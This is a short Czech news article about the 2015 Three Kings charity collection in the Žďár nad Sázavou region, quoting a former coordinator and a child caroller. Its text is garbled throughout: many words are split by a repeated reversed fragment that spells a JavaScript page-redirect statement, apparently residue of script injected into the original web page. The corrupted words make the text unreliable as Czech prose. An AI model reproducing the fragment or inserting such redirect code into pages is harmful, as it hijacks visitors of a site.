Tříkrálová sbírka 2015
Rainbow page separator

Tříkrálová koleda zní v ulicích i nadále

Úterý, 6. ledna 2015

Tříkrálová sbírka 2015

První Tříkrálový víkend je zdárně za námi. Víkendové koledníčky neodradila zima ani čerstvě napadaný sníh.

Na svou první Tříkrálovou koledu vyrazila i desetiměsíční Kateřina Kuch[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tová, která společně se svou maminkou Michaelou, dlouhole[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou koordiná[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torkou Tříkrálové sbírky ve žďárské Charitě, nyní na rodičovské dovolené, navštívila několik novoměstských domácností.

Tříkrálová sbírka 2015„Kateřinka jako správná královna prošla měsíční přípravou na koledu, sledovala obrázky králů z knížky pro děti a poslouchala tóny tříkrálové koledy. V sobotu ráno jsme vyrazily jako přidružené členky jedné novoměstské skupinky. Musím říci, že [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to byl velmi příjemný pocit. Poprvé jsem si sbírku užila ne jako její koordiná[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torka, ale koledovala jsem se svou malou dcerou a myslela na dálku na všechny krále okresu a asistenty, kteří Charitě pomáhají celou sbírku organizovat,“ sdělila nám své pocity Michaela Kuch[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tová, le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos poprvé po devíti letech mimo funkci hlavní organizá[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torky sbírky žďárské Charity.

S novými obleky se le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos může pyšnit patnáct koledníků z Velkomeziříčska. Ty pro ně ušili v rámci jedné z dílen uživatelé jednoho z charitních zařízení – žďárského Klubu v 9 – centra služeb pro podporu duševního zdraví.
A jaká je motivace koledníčků účastnit se Tříkrálové sbírky? Osmiletá Magdalénka z Račína o [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom ví své: „Koledováním bych ráda pomohla lidem, kteří jsou nemocní a potřebují peníze na péči o sebe. Co mě na [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom baví? – To, že chodíme dům od domu a zpíváme a přicházíme oblečeni jako Tři králové a lidé mají radost. A my Tři králové máme radost, že se nám plní kasička a košík na sladkosti. Je ale zvláštní, že staré babičky čas[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to přispějí do kasičky víc než člověk s drahým autem a velkým domem. A také každý rok se na [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to moc těšíme, i lidi se nás ptají, jestli budeme zase chodit, jsou rádi.“

Jako poděkování připravuje Oblastní charita Žďár nad Sázavou všem dobrovolníkům, kteří se na Tříkrálové sbírce jakkoliv podílejí, a také dárcům, kteří přispějí na charitní projekty, již IX. Tříkrálový koncert v neděli 11. ledna v 17.00 hodin v kostele sv. Kunhuty v Novém Městě na Moravě.
Ve středu 14. ledna bude patnáctá jubilejní sbírka le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošního roku zakončena.

Lenka Šustrová